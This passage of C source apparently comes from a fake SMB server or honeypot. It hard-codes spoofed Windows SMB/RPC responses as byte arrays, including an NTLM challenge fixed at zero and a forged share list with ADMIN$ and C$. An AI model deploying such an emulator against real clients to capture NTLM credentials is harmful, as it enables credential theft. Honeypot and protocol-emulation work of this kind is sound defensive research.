Response\r\n\"\\x00\\x00\\x01\\x1b\"\r\n\"\\xff\\x53\\x4d\\x42\\x73\\x16\\x00\\x00\\xc0\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\" // Tree ID: 0\r\n\"\\x00\\x00\" // Process ID: 0\r\n\"\\x00\\x00\" // USER ID\r\n\"\\x00\\x00\" // Multiplex ID: 0\r\n\"\\x04\\xff\\x00\\x1b\\x01\\x00\\x00\\xa6\\x00\\xf0\\x00\\x4e\\x54\\x4c\\x4d\\x53\"\r\n\"\\x53\\x50\\x00\\x02\\x00\\x00\\x00\\x12\\x00\\x12\\x00\\x30\\x00\\x00\\x00\\x15\"\r\n\"\\x82\\x8a\\xe0\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // NTLM Challenge\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x64\\x00\\x64\\x00\\x42\\x00\\x00\\x00\"\r\n\"\\x53\\x00\\x45\\x00\\x52\\x00\\x56\\x00\\x49\\x00\\x43\\x00\\x45\\x00\\x50\\x00\"\r\n\"\\x43\\x00\\x02\\x00\\x12\\x00\\x53\\x00\\x45\\x00\\x52\\x00\\x56\\x00\\x49\\x00\"\r\n\"\\x43\\x00\\x45\\x00\\x50\\x00\\x43\\x00\\x01\\x00\\x12\\x00\\x53\\x00\\x45\\x00\"\r\n\"\\x52\\x00\\x56\\x00\\x49\\x00\\x43\\x00\\x45\\x00\\x50\\x00\\x43\\x00\\x04\\x00\"\r\n\"\\x12\\x00\\x73\\x00\\x65\\x00\\x72\\x00\\x76\\x00\\x69\\x00\\x63\\x00\\x65\\x00\"\r\n\"\\x70\\x00\\x63\\x00\\x03\\x00\\x12\\x00\\x73\\x00\\x65\\x00\\x72\\x00\\x76\\x00\"\r\n\"\\x69\\x00\\x63\\x00\\x65\\x00\\x70\\x00\\x63\\x00\\x06\\x00\\x04\\x00\\x01\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x57\\x00\\x69\\x00\\x6e\\x00\\x64\\x00\\x6f\"\r\n\"\\x00\\x77\\x00\\x73\\x00\\x20\\x00\\x35\\x00\\x2e\\x00\\x31\\x00\\x00\\x00\\x57\"\r\n\"\\x00\\x69\\x00\\x6e\\x00\\x64\\x00\\x6f\\x00\\x77\\x00\\x73\\x00\\x20\\x00\\x32\"\r\n\"\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x4c\\x00\\x41\\x00\\x4e\\x00\\x20\"\r\n\"\\x00\\x4d\\x00\\x61\\x00\\x6e\\x00\\x61\\x00\\x67\\x00\\x65\\x00\\x72\\x00\\x00\";\r\n\r\nunsigned char SessionSetupAndXAuth[] =\r\n\"\\x00\\x00\\x00\\x75\"\r\n\"\\xff\\x53\\x4d\\x42\\x73\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\" // Tree ID: 0\r\n\"\\x00\\x00\" // Process ID: 0\r\n\"\\x00\\x00\" // USER ID\r\n\"\\x00\\x00\" // Multiplex ID: 0\r\n\"\\x04\\xff\\x00\\x75\\x00\\x01\\x00\\x00\\x00\\x4a\\x00\\x4e\\x57\\x00\\x69\\x00\"\r\n\"\\x6e\\x00\\x64\\x00\\x6f\\x00\\x77\\x00\\x73\\x00\\x20\\x00\\x35\\x00\\x2e\\x00\"\r\n\"\\x31\\x00\\x00\\x00\\x57\\x00\\x69\\x00\\x6e\\x00\\x64\\x00\\x6f\\x00\\x77\\x00\"\r\n\"\\x73\\x00\\x20\\x00\\x32\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x4c\\x00\"\r\n\"\\x41\\x00\\x4e\\x00\\x20\\x00\\x4d\\x00\\x61\\x00\\x6e\\x00\\x61\\x00\\x67\\x00\"\r\n\"\\x65\\x00\\x72\\x00\\x00\";\r\n\r\nunsigned char TreeConnectAndX[] =\r\n\"\\x00\\x00\\x00\\x38\"\r\n\"\\xff\\x53\\x4d\\x42\\x75\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\" // Tree ID: 0\r\n\"\\x00\\x00\" // Process ID: 0\r\n\"\\x00\\x00\" // USER ID\r\n\"\\x00\\x00\" // Multiplex ID: 0\r\n\"\\x07\\xff\\x00\\x38\\x00\\x01\\x00\\xff\\x01\\x00\\x00\\xff\\x01\\x00\\x00\\x07\"\r\n\"\\x00\\x49\\x50\\x43\\x00\\x00\\x00\\x00\";\r\n\r\nunsigned char SmbNtCreate [] =\r\n\"\\x00\\x00\\x00\\x87\"\r\n\"\\xff\\x53\\x4d\\x42\" // SMB\r\n\"\\xa2\" // SMB Command: NT Create AndX (0xa2)\r\n\"\\x00\\x00\\x00\\x00\" // NT Status: STATUS_SUCCESS (0x00000000)\r\n\"\\x98\" // Flags: 0x98\r\n\"\\x07\\xc8\" // Flags2 : 0xc807\r\n\"\\x00\\x00\" // Process ID High: 0\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Signature: 0000000000000000\r\n\"\\x00\\x00\" // Reserved: 0000\r\n\"\\x00\\x00\" // Tree ID: 0\r\n\"\\x00\\x00\" // Process ID: 0\r\n\"\\x00\\x00\" // User ID: 0\r\n\"\\x00\\x00\" // Multiplex ID: 0\r\n\"\\x2a\" // Word Count (WCT): 42\r\n\"\\xff\" // AndXCommand: No further commands (0xff)\r\n\"\\x00\" // Reserved: 00\r\n\"\\x87\\x00\" // AndXOffset: 135\r\n\"\\x00\" // Oplock level: No oplock granted (0)\r\n\"\\x00\\x00\" // FID: 0\r\n\"\\x01\\x00\\x00\\x00\" // Create action: The file existed and was opened (1)\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Created: No time specified (0)\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Last Access: No time specified (0)\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Last Write: No time specified (0)\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Change: No time specified (0)\r\n\"\\x80\\x00\\x00\\x00\" // File Attributes: 0x00000080\r\n\"\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\" // Allocation Size: 4096\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // End Of File: 0\r\n\"\\x02\\x00\" // File Type: Named pipe in message mode (2)\r\n\"\\xff\\x05\" // IPC State: 0x05ff\r\n\"\\x00\" // Is Directory: This is NOT a directory (0)\r\n\"\\x00\\x00\" // Byte Count (BCC): 0\r\n\r\n// crap\r\n\"\\x00\\x00\\x00\\x0f\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x74\\x7a\\x4f\\xac\\x2d\\xdf\\xd9\"\r\n\"\\x11\\xb9\\x20\\x00\\x10\\xdc\\x9b\\x01\"\r\n\"\\x12\\x00\\x9b\\x01\\x12\\x00\\x1b\\xc2\";\r\n\r\nunsigned char DceRpc[] =\r\n\"\\x00\\x00\\x00\\x7c\"\r\n\"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\" // Tree ID: 0\r\n\"\\x00\\x00\" // Process ID: 0\r\n\"\\x00\\x00\" // USER ID\r\n\"\\x00\\x00\" // Multiplex ID: 0\r\n\"\\x0a\\x00\\x00\\x44\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x44\\x00\\x38\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x45\\x00\\x00\\x05\\x00\\x0c\\x03\\x10\\x00\\x00\\x00\"\r\n\"\\x44\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xb8\\x10\\xb8\\x10\"\r\n\"\\x00\\x00\\x00\\x00\" // Assoc Group\r\n\"\\x0d\\x00\\x5c\\x50\\x49\\x50\\x45\\x5c\"\r\n\"\\x00\\x00\\x00\" // srv or wks\r\n\"\\x73\\x76\\x63\\x00\\xff\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x5d\\x88\"\r\n\"\\x8a\\xeb\\x1c\\xc9\\x11\\x9f\\xe8\\x08\\x00\\x2b\\x10\\x48\\x60\\x02\\x00\\x00\"\r\n\"\\x00\";\r\n\r\nunsigned char WksSvc[] =\r\n\"\\x00\\x00\\x00\\xb0\"\r\n\"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\" // Tree ID: 0\r\n\"\\x00\\x00\" // Process ID: 0\r\n\"\\x00\\x00\" // USER ID\r\n\"\\x00\\x00\" // Multiplex ID: 0\r\n\"\\x0a\\x00\\x00\\x78\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x78\\x00\\x38\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x79\\x00\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00\"\r\n\"\\x78\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x60\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x64\\x00\\x00\\x00\\xb8\\x0f\\x16\\x00\\xf4\\x01\\x00\\x00\\xe6\\x0f\\x16\\x00\"\r\n\"\\xd2\\x0f\\x16\\x00\\x05\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0a\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x0a\\x00\\x00\\x00\\x53\\x00\\x45\\x00\\x52\\x00\\x56\\x00\"\r\n\"\\x49\\x00\\x43\\x00\\x45\\x00\\x50\\x00\\x43\\x00\\x00\\x00\\x0a\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x0a\\x00\\x00\\x00\\x57\\x00\\x4f\\x00\\x52\\x00\\x4b\\x00\"\r\n\"\\x47\\x00\\x52\\x00\\x4f\\x00\\x55\\x00\\x50\\x00\\x00\\x00\\x00\\x00\\x00\\x00\";\r\n\r\nunsigned char SrvSvc[] =\r\n\"\\x00\\x00\\x00\\xac\"\r\n\"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\" // Tree ID: 0\r\n\"\\x00\\x00\" // Process ID: 0\r\n\"\\x00\\x00\" // USER ID\r\n\"\\x00\\x00\" // Multiplex ID: 0\r\n\"\\x0a\\x00\\x00\\x74\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x74\\x00\\x38\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x75\\x00\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00\"\r\n\"\\x74\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x5c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x65\\x00\\x00\\x00\\x68\\x3d\\x14\\x00\\xf4\\x01\\x00\\x00\"\r\n\"\\x80\\x3d\\x14\\x00\" // Server IP\r\n\"\\x05\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x03\\x10\\x05\\x00\\x9c\\x3d\\x14\\x00\"\r\n\"\\x0e\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0e\\x00\\x00\\x00\"\r\n\"\\x31\\x00\\x39\\x00\\x32\\x00\\x2e\\x00\\x31\\x00\\x36\\x00\\x38\\x00\\x2e\\x00\" // Server IP ( UNICODE )\r\n\"\\x32\\x00\\x2e\\x00\\x31\\x00\\x30\\x00\\x33\\x00\\x00\\x00\"\r\n\"\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x55\\x00\"\r\n\"\\x00\\x00\\x00\\x00\";\r\n\r\nunsigned char SmbClose[] =\r\n\"\\x00\\x00\\x00\\x23\"\r\n\"\\xff\\x53\\x4d\\x42\" // SMB\r\n\"\\x04\" // SMB Command: Close (0x04)\r\n\"\\x00\\x00\\x00\\x00\" // NT Status: STATUS_SUCCESS (0x00000000)\r\n\"\\x98\" // Flags: 0x98\r\n\"\\x07\\xc8\" // Flags2 : 0xc807\r\n\"\\x00\\x00\" // Process ID High: 0\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Signature: 0000000000000000\r\n\"\\x00\\x00\" // Reserved: 0000\r\n\"\\x00\\x00\" // Tree ID: 0\r\n\"\\x00\\x00\" // Process ID: 0\r\n\"\\x00\\x00\" // USER ID\r\n\"\\x00\\x00\" // Multiplex ID: 0\r\n\"\\x00\" // Word Count (WCT): 0\r\n\"\\x00\\x00\"; // Byte Count (BCC): 0\r\n\r\nunsigned char NetrShareEnum[] =\r\n\"\\x00\\x00\\x01\\x90\"\r\n\"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\" // Tree ID: 0\r\n\"\\x00\\x00\" // Process ID: 0\r\n\"\\x00\\x00\" // USER ID\r\n\"\\x00\\x00\" // Multiplex ID: 0\r\n\"\\x0a\\x00\\x00\\x58\\x01\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x58\\x01\\x38\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x59\\x01\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00\"\r\n\"\\x58\\x01\\x00\\x00\\x01\\x00\\x00\\x00\\x40\\x01\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x54\\x0a\\x17\\x00\\x04\\x00\\x00\\x00\"\r\n\"\\xa0\\x28\\x16\\x00\\x04\\x00\\x00\\x00\\x80\\x48\\x16\\x00\\x03\\x00\\x00\\x80\"\r\n\"\\x8a\\x48\\x16\\x00\\x6e\\x48\\x16\\x00\\x00\\x00\\x00\\x00\\x7e\\x48\\x16\\x00\"\r\n\"\\x48\\x48\\x16\\x00\\x00\\x00\\x00\\x80\\x56\\x48\\x16\\x00\\x20\\x48\\x16\\x00\"\r\n\"\\x00\\x00\\x00\\x80\\x26\\x48\\x16\\x00\\x05\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x05\\x00\\x00\\x00\\x49\\x00\\x50\\x00\\x43\\x00\\x24\\x00\\x00\\x00\\x36\\x00\"\r\n\"\\x0b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0b\\x00\\x00\\x00\\x52\\x00\\x65\\x00\"\r\n\"\\x6d\\x00\\x6f\\x00\\x74\\x00\\x65\\x00\\x2d\\x00\\x49\\x00\\x50\\x00\\x43\\x00\"\r\n\"\\x00\\x00\\x37\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\"\r\n\"\\x6e\\x00\\x65\\x00\\x74\\x00\\x62\\x00\\x69\\x00\\x6f\\x00\\x73\\x00\\x00\\x00\"\r\n\"\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x41\\x00\\x44\\x00\"\r\n\"\\x4d\\x00\\x49\\x00\\x4e\\x00\\x24\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x52\\x00\\x65\\x00\\x6d\\x00\\x6f\\x00\"\r\n\"\\x74\\x00\\x65\\x00\\x61\\x00\\x64\\x00\\x6d\\x00\\x69\\x00\\x6e\\x00\\x00\\x00\"\r\n\"\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x43\\x00\\x24\\x00\"\r\n\"\\x00\\x00\\x39\\x00\\x11\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x11\\x00\\x00\\x00\"\r\n\"\\x53\\x00\\x74\\x00\\x61\\x00\\x6e\\x00\\x64\\x00\\x61\\x00\\x72\\x00\\x64\\x00\"\r\n\"\\x66\\x00\\x72\\x00\\x65\\x00\\x69\\x00\\x67\\x00\\x61\\x00\\x62\\x00\\x65\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\";\r\n\r\nunsigned char OpenPrinterEx[] =\r\n\"\\x00\\x00\\x00\\x68\"\r\n\"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\" // Tree ID: 0\r\n\"\\x00\\x00\" // Process ID: 0\r\n\"\\x00\\x00\" // USER ID\r\n\"\\x00\\x00\" // Multiplex ID: 0\r\n\"\\x0a\\x00\\x00\\x30\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x30\\x00\\x38\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x31\\x00\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00\"\r\n\"\\x30\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x24\\xd7\\x9c\\xf8\\xbb\\xe1\\xd9\\x11\\xb9\\x29\\x00\\x10\"\r\n\"\\xdc\\x4a\\x6b\\xbb\\x00\\x00\\x00\\x00\";\r\n\r\nunsigned char ClosePrinter[] =\r\n\"\\x00\\x00\\x00\\x68\"\r\n\"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\" // Tree ID: 0\r\n\"\\x00\\x00\" // Process ID: 0\r\n\"\\x00\\x00\" // USER ID\r\n\"\\x00\\x00\" // Multiplex ID: 0\r\n\"\\x0a\\x00\\x00\\x30\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x30\\x00\\x38\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x31\\x00\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00\"\r\n\"\\x30\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\";\r\n\r\nunsigned char OpenHklm[] =\r\n\"\\x00\\x00\\x00\\x68\"\r\n\"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\" // Tree ID: 0\r\n\"\\x00\\x00\" // Process ID: 0\r\n\"\\x00\\x00\" // USER ID\r\n\"\\x00\\x00\" // Multiplex ID: 0\r\n\"\\x0a\\x00\\x00\\x30\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x30\\x00\\x38\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x31\\x00\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00\"\r\n\"\\x30\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x4e\\x4c\\xb2\\xf8\\xbb\\xe1\\xd9\\x11\\xb9\\x29\\x00\\x10\"\r\n\"\\xdc\\x4a\\x6b\\xbb\\x00\\x00\\x00\\x00\";\r\n\r\nunsigned char OpenKey[] =\r\n\"\\x00\\x00\\x00\\x68\"\r\n\"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\" // Tree ID: 0\r\n\"\\x00\\x00\" // Process ID: 0\r\n\"\\x00\\x00\" // USER ID\r\n\"\\x00\\x00\" // Multiplex ID: 0\r\n\"\\x0a\\x00\\x00\\x30\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x30\\x00\\x38\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x31\\x00\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00\"\r\n\"\\x30\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\";\r\n\r\nunsigned char CloseKey[] =\r\n\"\\x00\\x00\\x00\\x68\"\r\n\"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\" // Tree ID: 0\r\n\"\\x00\\x00\" // Process ID: 0\r\n\"\\x00\\x00\" // USER ID\r\n\"\\x00\\x00\" // Multiplex ID: 0\r\n\"\\x0a\\x00\\x00\\x30\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x30\\x00\\x38\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x31\\x00\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00\"\r\n\"\\x30\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\";\r\n\r\nunsigned char NetBios1[] =\r\n\"\\x00\\x00\\x00\\x94\"\r\n\"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\" // Tree ID: 0\r\n\"\\x00\\x00\" // Process ID: 0\r\n\"\\x00\\x00\" // USER ID\r\n\"\\x00\\x00\" // Multiplex ID: 0\r\n\"\\x0a\\x00\\x00\\x5c\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x5c\\x00\\x38\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x5d\\x00\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00\"\r\n\"\\x5c\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x44\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x01\\x00\\x00\\x00\\xc0\\xa2\\x16\\x00\\xae\\xc2\\x16\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\xbe\\xc2\\x16\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\"\r\n\"\\x6e\\x00\\x65\\x00\\x74\\x00\\x62\\x00\\x69\\x00\\x6f\\x00\\x73\\x00\\x00\\x00\"\r\n\"\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x2e\\x00\"\r\n\"\\x00\\x00\\x00\\x00\";\r\n\r\nunsigned char NetBios2[] =\r\n\"\\x00\\x00\\x00\\x3e\"\r\n\"\\xff\\x53\\x4d\\x42\\x75\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\" // Tree ID: 0\r\n\"\\x00\\x00\" // Process ID: 0\r\n\"\\x00\\x00\" // USER ID\r\n\"\\x00\\x00\" // Multiplex ID: 0\r\n\"\\x07\\xff\\x00\\x3e\\x00\\x01\\x00\\xff\\x01\\x00\\x00\\xff\\x01\\x00\\x00\\x0d\"\r\n\"\\x00\\x41\\x3a\\x00\\x4e\\x00\\x54\\x00\\x46\\x00\\x53\\x00\\x00\\x00\";\r\n\r\n// Trans2 Response, QUERY_PATH_INFO\r\nunsigned char Trans2Response1[] =\r\n\"\\x00\\x00\\x00\\x64\"\r\n\"\\xff\\x53\\x4d\\x42\" // SMB\r\n\"\\x32\" // SMB Command: Trans2 (0x32)\r\n\"\\x00\\x00\\x00\\x00\" // NT Status: STATUS_SUCCESS (0x00000000)\r\n\"\\x98\" // Flags: 0x98\r\n\"\\x07\\xc8\" // Flags2 : 0xc807\r\n\"\\x00\\x00\" // Process ID High: 0\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Signature: 0000000000000000\r\n\"\\x00\\x00\" // Reserved: 0000\r\n\"\\x00\\x00\" // Tree ID: 0\r\n\"\\x00\\x00\" // Process ID: 0\r\n\"\\x00\\x00\" // USER ID\r\n\"\\x00\\x00\" // Multiplex ID: 0\r\n\"\\x0a\" // Word Count (WCT): 10\r\n\"\\x02\\x00\" // Total Parameter Count: 2\r\n\"\\x28\\x00\" // Total Data Count: 40\r\n\"\\x00\\x00\" // Reserved: 0000\r\n\"\\x02\\x00\" // Parameter Count: 2\r\n\"\\x38\\x00\" // Parameter Offset: 56\r\n\"\\x00\\x00\" // Parameter Displacement: 0\r\n\"\\x28\\x00\" // Data Count: 40\r\n\"\\x3c\\x00\" // Data Offset: 60\r\n\"\\x00\\x00\" // Data Displacement: 0\r\n\"\\x00\" // Setup Count: 0\r\n\"\\x00\" // Reserved: 00\r\n\"\\x2d\\x00\" // Byte Count (BCC): 45\r\n\"\\x00\" // Padding: 00\r\n\"\\x00\\x00\" // EA Error offset: 0\r\n\"\\x00\\x01\" // Padding: 0001\r\n\"\\xe8\\x35\\xcf\\x94\\x39\\x73\\xc5\\x01\" // Created: Jun 17, 2005 05:39:19.686500000\r\n\"\\x8c\\x24\\xba\\x5c\\x3a\\x73\\xc5\\x01\" // Last Access: Jun 17, 2005 05:44:55.092750000\r\n\"\\xe8\\x35\\xcf\\x94\\x39\\x73\\xc5\\x01\" // Last Write: Jun 17, 2005 05:39:19.686500000\r\n\"\\x9c\\x81\\x67\\x98\\x39\\x73\\xc5\\x01\" // Change: Jun 17, 2005 05:39:25.717750000\r\n\"\\x10\\x00\\x00\\x00\" // File Attributes: 0x00000010\r\n\"\\x00\\x00\\x00\\x00\"; // Unknown Data: 00000000\r\n\r\n// Trans2 Response, QUERY_PATH_INFO\r\nunsigned char Trans2Response2[] = // ERROR Response\r\n\"\\x00\\x00\\x00\\x23\"\r\n\"\\xff\\x53\\x4d\\x42\\x32\\x34\\x00\\x00\\xc0\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\" // Tree ID: 0\r\n\"\\x00\\x00\" // Process ID: 0\r\n\"\\x00\\x00\" // USER ID\r\n\"\\x00\\x00\" // Multiplex ID: 0\r\n\"\\x00\\x00\\x00\";\r\n\r\n// Trans2 Response, FIND_FIRST2, Files: . ..\r\nunsigned char Trans2Response3[] =\r\n\"\\x00\\x00\\x01\\x0c\"\r\n\"\\xff\\x53\\x4d\\x42\" // SMB\r\n\"\\x32\" // SMB Command: Trans2 (0x32)\r\n\"\\x00\\x00\\x00\\x00\" // NT Status: STATUS_SUCCESS (0x00000000)\r\n\"\\x98\" // Flags: 0x98\r\n\"\\x07\\xc8\" // Flags2 : 0xc807\r\n\"\\x00\\x00\" // Process ID High: 0\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Signature: 0000000000000000\r\n\"\\x00\\x00\" // Reserved: 0000\r\n\"\\x00\\x00\" // Tree ID: 0\r\n\"\\x00\\x00\" // Process ID: 0\r\n\"\\x00\\x00\" // USER ID\r\n\"\\x00\\x00\" // Multiplex ID: 0\r\n\"\\x0a\" // Word Count (WCT): 10\r\n\"\\x0a\\x00\" // Total Parameter Count: 10\r\n\"\\xc8\\x00\" // Total Data Count: 200\r\n\"\\x00\\x00\" // Reserved: 0000\r\n\"\\x0a\\x00\" // Parameter Count: 10\r\n\"\\x38\\x00\" // Parameter Offset: 56\r\n\"\\x00\\x00\" // Parameter Displacement: 0\r\n\"\\xc8\\x00\" // Data Count: 200\r\n\"\\x44\\x00\" // Data Offset: 68\r\n\"\\x00\\x00\" // Data Displacement: 0\r\n\"\\x00\" // Setup Count: 